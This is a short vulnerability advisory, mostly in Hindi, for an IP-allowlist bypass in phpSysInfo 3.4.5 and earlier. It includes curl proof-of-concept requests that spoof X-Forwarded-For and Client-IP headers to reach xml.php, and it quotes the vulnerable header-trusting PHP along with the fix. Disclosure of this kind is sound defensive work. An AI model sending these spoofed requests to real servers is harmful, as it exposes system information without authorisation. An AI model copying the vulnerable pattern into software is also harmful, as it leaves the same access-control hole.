
CVE-2026-55584 — phpSysInfo IP अनुमति-सूची बाईपास
CWE-290, CVSS 7.5 (उच्च), phpSysInfo <= 3.4.5
संदर्भ: GHSA-786w-p5pm-cvgh, CVE.org
PSI_ALLOWED क्लाइंट IP को हमलावर-नियंत्रित X-Forwarded-For (फिर Client-IP) हेडर से हल करता है, इससे पहले कि यह REMOTE_ADDR पर वापस आए। कोई विश्वसनीय-प्रॉक्सी अवधारणा नहीं है, इसलिए अनुमत IP को स्पूफ करने से अनुमति सूची विफल हो जाती है और xml.php के माध्यम से पूर्ण सिस्टम जानकारी उजागर होती है।
PoC:
# allowlist set to an address the attacker doesn't own (ALLOWED=8.8.8.8)
curl -s http://target/xml.php # "Client IP address (...) not allowed."
curl -s -H "X-Forwarded-For: 8.8.8.8" http://target/xml.php # bypass, full XML
curl -s -H "Client-IP: 8.8.8.8" http://target/xml.php # bypass, full XML
कमजोर कोड (read_config.php):
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} elseif (isset($_SERVER["HTTP_CLIENT_IP"])) {
$ip = $_SERVER["HTTP_CLIENT_IP"];
} else {
$ip = $_SERVER["REMOTE_ADDR"]; // only trustworthy source, checked last
}
ठीक किया गया 3.4.6 (019fa2d): डिफ़ॉल्ट रूप से REMOTE_ADDR; कॉन्फ़िगर किए गए विश्वसनीय प्रॉक्सी से ही X-Forwarded-For / Client-IP का सम्मान करें।
रिपोर्ट किया गया: Muhammed Mirac Kayıkci